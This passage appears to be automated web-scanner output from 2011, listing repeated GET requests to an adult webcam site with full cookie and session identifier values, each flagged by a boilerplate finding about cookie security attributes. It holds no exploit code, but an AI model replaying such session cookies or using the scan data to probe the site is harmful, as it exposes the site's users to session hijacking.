GET /live-sex-chats/shemale-couple/ HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:22:14 GMT Connection: close Content-Length: 93218 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /live-sex-chats/shemale/ HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:21:17 GMT Connection: close Content-Length: 223493 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /live-sex-chats/shy-girl/ HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:18:49 GMT Connection: close Content-Length: 167612 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /liveexperts.asp HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html Expires: Sat, 03 May 2008 14:11:18 GMT Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmsTHmj4p7KUq0DeR%2BO3xTkb; path=/ X-Powered-By: vsrv49 Date: Fri, 28 Jan 2011 14:11:18 GMT Connection: close Content-Length: 19369 Vary: Accept-Encoding
<html> <head> <title>live webcam video chat with experts at imlive</title> <meta name="description" content="Live video chat sessions with experts in just about anything - Mysticism & Spir ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /localcompanionship.asp HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html Expires: Sat, 03 May 2008 14:11:20 GMT Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmuTmCT55rdh7t3zZ04MFTzw; path=/ X-Powered-By: vsrv49 Date: Fri, 28 Jan 2011 14:11:20 GMT Connection: close Content-Length: 16528 Vary: Accept-Encoding
<html> <head> <title>Friends & Romance on Webcam Video Chat at ImLive</title> <meta name="description" content="Like shopping? Go out to restaurants? Find your soul mate on live webcam vid ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /minglesingles.asp HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html Expires: Sat, 03 May 2008 14:11:18 GMT Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmuTmCT55rdh7t3zZ04MFTzw; path=/ X-Powered-By: vsrv49 Date: Fri, 28 Jan 2011 14:11:19 GMT Connection: close Content-Length: 16092 Vary: Accept-Encoding
<html> <head> <title>Mingle With Friends on Live Webcam Video Chat at ImLive</title> <meta name="description" content="Mingle with Singles on live webcam video chat - Find a match and go on ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /pr.asp HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html Expires: Sat, 03 May 2008 14:11:28 GMT Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; path=/ X-Powered-By: vsrv49 Date: Fri, 28 Jan 2011 14:11:27 GMT Connection: close Content-Length: 9835 Vary: Accept-Encoding
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /preparesearch.aspx HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:24:23 GMT Connection: close Content-Length: 18859 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /sex_webcams_index/index.asp HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html Expires: Sat, 03 May 2008 14:23:00 GMT Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2FSf8bs6wRlvXx1sFag%3D%3D; path=/ Set-Cookie: ix=k; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:23:00 GMT Connection: close Content-Length: 23768 Vary: Accept-Encoding
<html> <head> <title> Live Sex Chat Categories at ImLive </title> <meta name="description" content="Live sex chat with girls, lesbians, gays, couples, threesomes and fetish lovers. CO ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /sitemap.html HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html Expires: Sat, 03 May 2008 14:23:00 GMT Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2FSf8bs6wRlvXx1sFag%3D%3D; path=/ Set-Cookie: ix=k; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:23:00 GMT Connection: close Content-Length: 33732 Vary: Accept-Encoding
<html> <head> <meta name="keywords" content="live Video Chat, Video Chat live, Video Chat live, live Video Chat, webcam chat, live web cam, webcam live, live webcam, web cam live, web cam communti ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /videosfr.asp HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html Expires: Sat, 03 May 2008 14:11:20 GMT Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmuTmCT55rdh7t3zZ04MFTzw; path=/ X-Powered-By: vsrv49 Date: Fri, 28 Jan 2011 14:11:21 GMT Connection: close Content-Length: 15706 Vary: Accept-Encoding
<html> <head> <title>Video Chat Recorded on Webcam at ImLive</title> <meta name="description" content="Come in and discover what our hosts have recorded in Friends & Romance live webcam vide ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /warningms.asp HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html Expires: Sat, 03 May 2008 14:23:28 GMT Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxgivxzPskYVay%2FvTxhkZKJA%3D%3D; path=/ Set-Cookie: ix=k; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:23:28 GMT Connection: close Content-Length: 14418 Vary: Accept-Encoding
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
